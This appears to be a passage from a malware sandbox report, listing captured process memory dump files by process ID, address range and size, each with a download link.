memory/1208-118-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/1208-113-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/1208-115-0x0000000001120000-0x00000000011A0000-memory.dmp

Filesize
512KB

Download
memory/1208-114-0x0000000001120000-0x00000000011A0000-memory.dmp

Filesize
512KB

Download
memory/1208-116-0x0000000001120000-0x00000000011A0000-memory.dmp

Filesize
512KB

Download
memory/1208-117-0x0000000001120000-0x00000000011A0000-memory.dmp

Filesize
512KB

Download
memory/1208-112-0x0000000001120000-0x00000000011A0000-memory.dmp

Filesize
512KB

Download
memory/1760-4-0x0000000041260000-0x00000000412E0000-memory.dmp

Filesize
512KB

Download
memory/1760-48-0x0000000041260000-0x00000000412E0000-memory.dmp

Filesize
512KB

Download
memory/1760-47-0x0000000041260000-0x00000000412E0000-memory.dmp

Filesize
512KB

Download
memory/1760-1-0x000007FEF5310000-0x000007FEF5CFC000-memory.dmp

Filesize
9.9MB

Download
memory/1760-16-0x000007FEF5310000-0x000007FEF5CFC000-memory.dmp

Filesize
9.9MB

Download
memory/1760-3-0x0000000041260000-0x00000000412E0000-memory.dmp

Filesize
512KB

Download
memory/1760-38-0x0000000041260000-0x00000000412E0000-memory.dmp

Filesize
512KB

Download
memory/1760-0-0x0000000041700000-0x0000000041B26000-memory.dmp

Filesize
4.1MB

Download
memory/1760-2-0x0000000041260000-0x00000000412E0000-memory.dmp

Filesize
512KB

Download
memory/2552-19-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-40-0x000000001B670000-0x000000001B6A2000-memory.dmp

Filesize
200KB

Download
memory/2552-41-0x000000001B670000-0x000000001B6A2000-memory.dmp

Filesize
200KB

Download
memory/2552-39-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-34-0x000000001B610000-0x000000001B618000-memory.dmp

Filesize
32KB

Download
memory/2552-20-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-85-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-18-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-15-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-74-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-14-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-13-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-12-0x0000000002670000-0x0000000002678000-memory.dmp

Filesize
32KB

Download
memory/2552-80-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-79-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-11-0x000000001B220000-0x000000001B502000-memory.dmp

Filesize
2.9MB

Download
memory/2552-81-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-82-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2552-84-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2640-78-0x00000000028CC000-0x0000000002933000-memory.dmp

Filesize
412KB

Download
memory/2640-77-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2640-76-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2640-75-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2640-73-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-55-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-52-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-54-0x0000000002400000-0x0000000002480000-memory.dmp

Filesize
512KB

Download
memory/2852-53-0x0000000002400000-0x0000000002480000-memory.dmp

Filesize
512KB

Download
memory/2852-51-0x0000000002400000-0x0000000002480000-memory.dmp

Filesize
512KB

Download
memory/2852-50-0x0000000002400000-0x0000000002480000-memory.dmp

Filesize
512KB

Download
memory/2852-49-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download